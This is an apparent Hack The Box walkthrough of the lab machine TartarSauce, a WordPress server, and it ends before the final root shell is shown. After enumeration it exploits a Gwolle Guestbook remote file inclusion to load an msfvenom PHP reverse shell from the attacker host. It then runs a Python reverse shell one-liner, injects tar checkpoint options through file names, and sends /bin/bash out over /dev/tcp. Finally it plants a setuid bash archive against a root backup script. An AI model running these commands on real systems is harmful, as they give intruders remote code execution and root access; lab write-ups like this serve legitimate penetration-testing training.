TartarSauce Walkthrough - Hack The Box

TartarSauce

TartarSauce is a vulnerable GNU/Linux web server on Hack The Box. This post will outline the penetration testing methodology used against the target and detail steps on how to successfully exploit and escalate privileges on the target.

Scanning

Using Nmap, we run a TCP SYN scan along with a UDP scan. The UDP scan comes up empty, but the TCP scan reveals a running web server:

# Nmap 7.92 scan initiated Sat Oct 29 11:36:10 2022 as: nmap -sSV -p- -A -Pn -v -oA tcp-tartarsauce
Nmap scan report for tartarsauce.htb (10.129.1.185)
Host is up (0.017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=9/24%OT=80%CT=1%CU=32627%PV=Y%DS=2%DC=T%G=Y%TM=632EDDC
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST1
OS:1NW7%O6=M539ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 43.817 days (since Thu Aug 11 16:00:12 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 995/tcp)
HOP RTT      ADDRESS
1   13.73 ms 10.10.14.1
2   15.29 ms tartarsauce.htb (10.129.1.185)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 29 11:36:49 2022 -- 1 IP address (1 host up) scanned in 38.91 seconds

The output from the scan, including the HTTP server response, reveals that this is most likely a GNU/Linux system running an Apache web server under an Ubuntu operating system.

Enumeration

Recursively brute-forcing directories on the webserver reveals a WordPress directory.

┌──(kali㉿kali)-[/mnt/kali-shared/HTB/tartarsauce]
└─$ gobuster dir -u http://10.129.1.185 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt                                                       
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.1.185
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/29 11:43:46 Starting gobuster in directory enumeration mode
===============================================================
/webservices          (Status: 301) [Size: 318] [--> http://10.129.1.185/webservices/]
/server-status        (Status: 403) [Size: 300]                                       
                                                                                      
===============================================================
2022/10/29 11:51:40 Finished
===============================================================
                                                                                                                                                               
┌──(kali㉿kali)-[/mnt/kali-shared/HTB/tartarsauce]
└─$ gobuster dir -u http://10.129.1.185/webservices -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.1.185/webservices
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/29 11:58:23 Starting gobuster in directory enumeration mode
===============================================================
/wp                   (Status: 301) [Size: 321] [--> http://10.129.1.185/webservices/wp/]
                                                                                         
===============================================================
2022/10/29 12:06:27 Finished
===============================================================

Having confirmed that we have a running WordPress instance on the server, we can run a scan on the target for further information gathering and to determine potential vulnerabilities.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://10.129.1.185/webservices/wp/ --enumerate ap,at,cb,dbe,u --plugins-detection aggressive                                             2 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.129.1.185/webservices/wp/ [10.129.1.185]
[+] Started: Sat Oct 29 12:14:56 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.129.1.185/webservices/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.129.1.185/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.129.1.185/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:07:31 <============================================================               > (81733 / 100928) 80.98%  ETA: 00:01:46
 Checking Known Locations - Time: 00:09:06 <=========================================================================> (100928 / 100928) 100.00% Time: 00:09:06
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/
 | Last Updated: 2022-09-28T15:27:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.0.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] brute-force-login-protection
 | Location: http://10.129.1.185/webservices/wp/wp-content/plugins/brute-force-login-protection/
 | Latest Version: 1.5.3 (up to date)
 | Last Updated: 2017-06-29T10:39:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/brute-force-login-protection/, status: 403
 |
 | Version: 1.5.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt

[+] gwolle-gb
 | Location: http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/
 | Last Updated: 2022-10-28T09:58:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | [!] The version is out of date, the latest version is 4.3.0
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
 |
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:02:15 <===========================================================================> (24817 / 24817) 100.00% Time: 00:02:15
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] twentyfifteen
 | Location: http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 1.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.9'

[+] twentyseventeen
 | Location: http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.4'

[+] twentysixteen
 | Location: http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.7
 | Style URL: http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/style.css
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.4'

[+] voce
 | Location: http://10.129.1.185/webservices/wp/wp-content/themes/voce/
 | Latest Version: 1.1.0 (up to date)
 | Last Updated: 2017-09-01T00:00:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/themes/voce/readme.txt
 | Style URL: http://10.129.1.185/webservices/wp/wp-content/themes/voce/style.css
 | Style Name: voce
 | Style URI: http://limbenjamin.com/pages/voce-wp.html
 | Description: voce is a minimal theme, suitable for text heavy articles. The front page features a list of recent ...
 | Author: Benjamin Lim
 | Author URI: https://limbenjamin.com
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/voce/, status: 500
 |
 | Version: 1.1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/voce/style.css, Match: 'Version: 1.1.0'

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:40 <================================================================================> (137 / 137) 100.00% Time: 00:00:40

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <======================================================================================> (71 / 71) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] wpadmin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Oct 29 12:27:35 2022
[+] Requests Done: 126007
[+] Cached Requests: 42
[+] Data Sent: 36.717 MB
[+] Data Received: 17.204 MB
[+] Memory used: 488.57 MB
[+] Elapsed time: 00:12:38

We have a username for which we can brute force the password, but with brute force login protections in place, this doesn’t get us anywhere. Another one of the enumerated plugins (gwolle-gb) however reveals that we could have a potentially exploitable vulnerability.

┌──(kali㉿kali)-[~]
└─$ searchsploit gwolle           
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                               |  Path
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion                                                              | php/webapps/38861.txt
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Vulnerability Assessment

Although our enumerated version of the Gwolle Guestbook plugin is 2.3.10 and the exploit was tested on 1.5.3, it may be the case that the vulnerability exists in later versions.

We can start testing this remote file inclusion vulnerability by generating a payload and executing the documented exploit.

  Exploit: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/38861
     Path: /usr/share/exploitdb/exploits/php/webapps/38861.txt
File Type: Unicode text, UTF-8 text, with very long lines (392)

Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015
Vendor Patch: October 16, 2015
Public Disclosure: November 4, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

In order to exploit this vulnerability 'allow_url_include' shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code.

Successful exploitation of this vulnerability will lead to entire WordPress installation compromise, and may even lead to the entire web server compromise.


-----------------------------------------------------------------------------------------------

Solution:

Update to Gwolle Guestbook 1.5.4

More Information:
https://wordpress.org/plugins/gwolle-gb/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23275 - https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle Guestbook WordPress Plugin.
[2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Exploitation

Using msfvenom we generate our payload:

┌──(kali㉿kali)-[~]
└─$ msfvenom -p php/reverse_php LHOST=10.129.1.185 LPORT=4444 > evil.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3015 bytes

Ater setting up our netcat listener, we make the HTTP GET request:

┌──(kali㉿kali)-[~]
└─$ curl http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.36/evil.php

The exploit works, and we have a reverse shell.

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.36] from (UNKNOWN) [10.129.1.185] 51786
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.36",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Further enumeration as the www-data user reveals that we can run tar as the onuma user without needing any credentials.

www-data@TartarSauce:/tmp$ sudo -l                 
sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar

We can abuse this privilege to gain a reverse shell as the onuma user. This is done by exploiting tar’s checkpoint feature to run other commands.

</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ cat <<'EOT'> /tmp/shell.sh       
<lle-gb/frontend/captcha$ cat <<'EOT'> /tmp/shell.sh                         
> #!/bin/bash
#!/bin/bash
> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.36",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
<fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'    
> EOT
EOT
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ cd /tmp
cd /tmp
www-data@TartarSauce:/tmp$ echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@TartarSauce:/tmp$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
www-data@TartarSauce:/tmp$ sudo -u onuma tar czf /tmp/backup.tar.gz *
sudo -u onuma tar czf /tmp/backup.tar.gz *

Setting up a netcat listener and executing the above commands, gives us a reverse shell as the onuma user.

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444                                    
listening on [any] 4444 ...
connect to [10.10.14.36] from (UNKNOWN) [10.129.1.185] 51790
$ id    
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

Enumeration as the onuma reveals a periodic running backuperer process running every 5 minutes with root privileges.

onuma@TartarSauce:/tmp$ ./pspy-32
./pspy-32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2022/10/29 08:26:31 CMD: UID=0    PID=999    | /lib/systemd/systemd-logind 
2022/10/29 08:26:31 CMD: UID=104  PID=997    | /usr/sbin/rsyslogd -n 
2022/10/29 08:26:31 CMD: UID=108  PID=978    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation 
2022/10/29 08:26:31 CMD: UID=0    PID=977    | /usr/sbin/acpid 
2022/10/29 08:26:31 CMD: UID=0    PID=976    | /usr/sbin/atd -f 
...
022/10/29 08:30:41 CMD: UID=???  PID=4958   | ???
2022/10/29 08:30:41 CMD: UID=???  PID=4957   | ???
2022/10/29 08:30:41 CMD: UID=???  PID=4956   | ???
2022/10/29 08:30:41 CMD: UID=0    PID=4955   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4954   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4953   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4952   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4951   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4950   | /bin/bash /usr/sbin/backuperer 
2022/10/29 08:30:41 CMD: UID=0    PID=4966   | /bin/bash /usr/sbin/backuperer 
2022/10/29 08:30:41 CMD: UID=0    PID=4965   | /bin/bash /usr/sbin/backuperer 
2022/10/29 08:30:41 CMD: UID=0    PID=4995   | /usr/bin/printf - 
2022/10/29 08:30:41 CMD: UID=0    PID=5000   | /bin/bash /usr/sbin/backuperer 
2022/10/29 08:30:42 CMD: UID=0    PID=5005   | /usr/bin/printf - 

Taking a closer look at the file reveals a backup script.

onuma@TartarSauce:~$ cat /usr/sbin/backuperer
cat /usr/sbin/backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

Studying the backup script we see that it runs a backup of the /var/www/html directory, waits 30 seconds and runs an integrity check. The integrity check is diff comparing the backup against the original directory. We want to return an exit code of 1 which indicates some differences, hence the same directory structure should be kept.

To successfully exploit this, we can first exfiltrate the 32-bit bash binary to our attack machine. We can do so with a netcat listener on our attack machine.

┌──(kali㉿kali)-[~/Downloads/var/www/html]                                                                                                                     
└─$ nc -nvlp 5555 > bash                                                                                                                                       
listening on [any] 5555 ...

On the target machine we then run:

onuma@TartarSauce:/bin$ cat /bin/bash > /dev/tcp/10.10.14.36/5555                                                                                              
cat /bin/bash > /dev/tcp/10.10.14.36/5555

Having the 32-bit bash binary on our machine we now change its ownership to the root user and assign the setuid attribute to it.

┌──(kali㉿kali)-[~]
└─$ sudo chown root:root bash                                                                                                                              1 ⨯
                                                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ sudo chmod u+s bash 

We now create the same var/www/html folder structure, transfer our bash binary into the directory and create a tar file of the directory.

┌──(kali㉿kali)-[~/Downloads]
└─$ mkdir -p var/www/html

┌──(kali㉿kali)-[~/Downloads]
└─$ mv bash var/www/html

┌──(kali㉿kali)-[~/Downloads]
└─$ tar -cvzf bash.tar.gz var       
var/
var/www/
var/www/html/
var/www/html/bash

After transferring the tar file to the target, we simply wait until the backuperer process executes and then overwrite the backup file with our tar file.

onuma@TartarSauce:/var/tmp$ cp bash.tar.gz .7930a232698058466d22f1bb33986ec9f78631be
< cp bash.tar.gz .7930a232698058466d22f1bb33986ec9f78631be                   
onuma@TartarSauce:/var/tmp$ ls -la                                             
ls -la 
total 1048                                                                     
drwxrwxrwt 10 root  root    4096 Oct 29 13:53 .
drwxr-xr-x 14 root  root    4096 May 12 06:55 ..
-rw-r--r--  1 onuma onuma 512044 Oct 29 13:53 .7930a232698058466d22f1bb33986ec9f78631be
-rw-r--r--  1 onuma onuma 512044 Oct 29 13:50 bash.tar.gz                                                                                                      
drwx------  3 root  root    4096 May 12 06:55 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
drwx------  3 root  root    4096 May 12 06:55 systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
drwx------  3 root  root    4096 May 12 06:55 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.service-UnGYDQ
drwx------  3 root  root    4096 May 12 06:55 systemd-private-9214912da64b4f9cb0a1a78abd4b4412-systemd-timesyncd.service-bUTA2R
drwx------  3 root  root    4096 May 12 06:55 systemd-private-a3f6b992cd2d42b6aba8bc011dd4aa03-systemd-timesyncd.service-3oO5Td
drwx------  3 root  root    4096 May 12 06:55 systemd-private-c11c7cccc82046a08ad1732e15efe497-systemd-timesyncd.service-QYRKER
drwx------  3 root  root    4096 Oct 29 06:28 systemd-private-d81ab013afe44ca093eb522e178dcde3-systemd-timesyncd.service-rls9tR
drwx------  3 root  root    4096 May 12 06:55 systemd-private-e11430f63fc04ed6bd67ec90687cb00e-systemd-timesyncd.service-PYhxgX

Once the check folder is created, we can navigate to the folder and run the bash binary with the -p flag to get root privileges.

onuma@TartarSauce:/var/tmp$ ls -la
ls -la
total 1052
drwxrwxrwt 11 root  root    4096 Oct 29 13:53 .
drwxr-xr-x 14 root  root    4096 May 12 06:55 ..
-rw-r--r--  1 onuma onuma 512044 Oct 29 13:53 .7930a232698058466d22f1bb33986ec9f78631be
-rw-r--r--  1 onuma onuma 512044 Oct 29 13:50 bash.tar.gz
drwxr-xr-x  3 root  root    4096 Oct 29 13:53 check
drwx------  3 root  root    4096 May 12 06:55 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
drwx------  3 root  root    4096 May 12 06:55 systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
drwx------  3 root  root    4096 May 12 06:55 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.service-UnGYDQ
drwx------  3 root  root    4096 May 12 06:55 systemd-private-9214912da64b4f9cb0a1a78abd4b4412-systemd-timesyncd.service-bUTA2R
drwx------  3 root  root    4096 May 12 06:55 systemd-private-a3f6b992cd2d42b6aba8bc011dd4aa03-systemd-timesyncd.service-3oO5Td
